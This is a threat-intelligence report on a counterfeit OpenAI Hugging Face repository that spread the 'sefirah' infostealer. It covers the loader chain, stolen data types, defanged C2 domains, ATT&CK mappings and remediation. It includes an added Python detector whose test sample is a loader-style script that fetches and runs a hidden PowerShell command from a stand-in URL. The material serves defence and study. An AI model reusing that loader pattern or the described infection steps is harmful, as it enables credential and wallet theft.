Executive Summary
Recent investigations by cybersecurity experts revealed an intricate supply chain attack utilizing a counterfeit OpenAI repository on the Hugging Face platform to spread infostealer malware. This fraudulent repository, designed to imitate genuine OpenAI projects, aimed to mislead developers, data scientists, and organizations in search of artificial intelligence tools. By exploiting the trust inherent in open-source ecosystems and the popularity of Hugging Face, the attackers managed to disseminate a highly effective infostealer capable of exfiltrating sensitive credentials, session tokens, and cryptocurrency wallets. This incident highlights the pressing need for robust supply chain security and increased vigilance when engaging with open-source resources.
Threat Actor Profile
The individuals behind this operation exhibited a remarkable level of technical proficiency and operational security. Though no concrete links to a known Advanced Persistent Threat (APT) group have been established, their tactics, techniques, and procedures (TTPs) align with those typically employed by financially motivated cybercriminals and supply chain attackers. This campaign employed typosquatting—registering repository names closely resembling legitimate OpenAI projects—and utilized social engineering through trending lists and SEO manipulation to extend its reach. The infrastructure and payloads involved bear similarities to previous npm typosquatting campaigns, including the distribution of the WinOS 4.0 implant, indicating a wider, ongoing supply chain threat. Furthermore, the attackers utilized automated bots to artificially inflate download and like counts on their repositories, thereby enhancing the perceived legitimacy of these malicious projects.
Technical Analysis of Malware/TTPs
The infection process commenced with the establishment of repositories like Open-OSS/privacy-filter and others under the anthfu namespace, all crafted to impersonate official OpenAI or notable AI projects. These repositories included a loader.py script, which disguised itself as harmless AI-related code but functioned as the initial loader for the malware.
When executed, loader.py disabled SSL verification, decoded a base64-encoded URL, and retrieved a remote JSON payload from it. This payload directed the loader to run a PowerShell command in a hidden window, which then downloaded a batch file (either update.bat or start.bat) from the attacker’s infrastructure, specifically the domain api.eth-fastscan[.]org. The batch file escalated privileges and fetched the final Rust-based infostealer payload, called sefirah.
The infostealer displayed advanced capabilities, targeting a range of browser data—including cookies, passwords, encryption keys, session tokens from Chromium and Gecko-based browsers, Discord tokens, local databases, master keys, cryptocurrency wallets, and browser extensions—as well as SSH/FTP/VPN credentials and sensitive local files like wallet seeds and keys. Additionally, it gathered system information and took multi-monitor screenshots. Exfiltration occurred via HTTP POST requests directed to the command-and-control (C2) domain recargapopular[.]com.
To avoid detection, the malware checked for the presence of virtual machines, sandboxes, debuggers, and analysis tools. It also inserted itself into Microsoft Defender exclusions to ensure persistence. The infection mechanism and malware behavior align with various MITRE ATT&CK techniques, including T1059 (Command and Scripting Interpreter), T1566 (Phishing), T1071 (Application Layer Protocol), T1555 (Credentials from Password Stores), T1086 (PowerShell), T1204 (User Execution), and T1027 (Obfuscated Files or Information).
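The loader behaviour described above (disabled TLS verification, base64-decoded URL, PowerShell in a hidden window) can be triaged statically before a downloaded script is ever run. The following is an added example, not code from the report or from HiddenLayer/Rescana; it walks the Python AST for those three indicators, and the SAMPLE script is constructed for the demonstration rather than being the real loader.py.

```python
import ast
import re

# Constructed sample resembling the behaviour the report describes; not the real loader.
SAMPLE = '''
import base64, ssl, subprocess, requests
ssl._create_default_https_context = ssl._create_unverified_context
u = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv").decode()
cfg = requests.get(u, verify=False).json()
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-c", cfg["cmd"]])
'''

def _dotted(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, else ''."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def triage(source: str) -> dict:
    """Map each loader-style indicator found to the source lines where it occurs."""
    hits = {"tls_verify_disabled": set(), "base64_decode": set(), "hidden_powershell": set()}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and any(
                _dotted(t) == "ssl._create_default_https_context" for t in node.targets):
            hits["tls_verify_disabled"].add(node.lineno)
        if not isinstance(node, ast.Call):
            continue
        if any(k.arg == "verify" and isinstance(k.value, ast.Constant) and k.value.value is False
               for k in node.keywords):
            hits["tls_verify_disabled"].add(node.lineno)  # e.g. requests.get(..., verify=False)
        if _dotted(node.func) in ("base64.b64decode", "base64.urlsafe_b64decode"):
            hits["base64_decode"].add(node.lineno)
        # String literals passed to the call: PowerShell launched with a hidden window
        literals = " ".join(c.value.lower() for c in ast.walk(node)
                            if isinstance(c, ast.Constant) and isinstance(c.value, str))
        if "powershell" in literals and re.search(r"\bhidden\b", literals):
            hits["hidden_powershell"].add(node.lineno)
    return {k: sorted(v) for k, v in hits.items() if v}

def is_suspicious(source: str) -> bool:
    """Escalate for manual review when two or more distinct indicators co-occur."""
    return len(triage(source)) >= 2
```

A single indicator (a lone base64 decode, say) is common in benign code, which is why the escalation rule requires at least two of them together.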
Exploitation in the Wild
This campaign achieved considerable reach, as the primary malicious repository (Open-OSS/privacy-filter) garnered over 244,000 downloads prior to its removal. However, analysis indicates that a significant number of these downloads were generated by automated bots to enhance the repository’s visibility and credibility. The attackers also promoted their repositories through social media platforms, such as LinkedIn and Reddit, alongside manipulating SEO to ensure that searches for OpenAI tools surfaced the malicious projects.
Victims included developers, AI/ML researchers, and organizations aiming to utilize OpenAI models or tools. Consequences ranged from credential theft and session hijacking to potential lateral movement within organizational networks and theft of cryptocurrency assets. Security vendors reported observing anomalous outbound traffic directed at the C2 infrastructure and noted attempts to access and extract credentials from compromised endpoints. The campaign’s tactics of leveraging trending repositories and typosquatting greatly elevated the risk of accidental compromise, even among security-aware users.
Victimology and Targeting
The primary targets of this campaign included individuals and organizations within the technology, AI/ML research, software development, and cryptocurrency sectors. The global nature of Hugging Face ensured that victims were spread across numerous countries, with a specific focus on English-speaking developer and research communities. The attackers specifically aimed at users seeking OpenAI tools, taking advantage of the brand’s reputation and the trust placed in platforms like Hugging Face by the open-source community. The tactics of typosquatting and replicating documentation further increased the chances of successful social engineering, as even seasoned users could be misled by the apparent authenticity of the repositories.
Mitigation and Countermeasures
Individuals and organizations that may have interacted with the compromised repositories should treat their systems as compromised and take the following actions: reimage all affected devices to guarantee complete eradication of the infostealer. Rotate all credentials, including SSH keys, browser passwords, cloud service credentials, Discord tokens, and cryptocurrency wallet seeds and keys. Additionally, invalidate all browser sessions and tokens to prevent session hijacking.
To avert future incidents, it is vital to verify the authenticity of repositories and packages before downloading or executing code, especially for high-value or security-sensitive projects. Inspect code and dependencies for suspicious activities, such as obfuscated scripts or unexpected network traffic. Implement advanced endpoint detection and response (EDR) solutions capable of identifying infostealer behavior and monitoring for outbound connections to dubious domains. Educate users and developers about the risks associated with typosquatting, social engineering, and supply chain attacks, reinforcing the significance of sourcing code only from official or well-vetted repositories.
Network monitoring should be configured to identify anomalous outbound traffic, particularly to domains like recargapopular[.]com, api.eth-fastscan[.]org, and welovechinatown[.]info. Security teams should also examine scheduled tasks and Microsoft Defender exclusions for unauthorized entries, which are commonly employed for persistence by the malware.
References
HiddenLayer: Malware Found in Trending Hugging Face Repository
BleepingComputer: Fake OpenAI repository on Hugging Face pushes infostealer malware
Reddit: WARNING: Open-OSS/privacy-filter MALWARE
MITRE ATT&CK Framework
Hugging Face Security Advisory
About Rescana
Rescana is a front-runner in third-party risk management (TPRM), offering organizations a comprehensive platform for the continuous monitoring, assessment, and mitigation of cyber risks across their digital supply chains. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats within the open-source and vendor ecosystems. For additional information or to discuss how we can assist in securing your organization, please contact us at ops@rescana.com.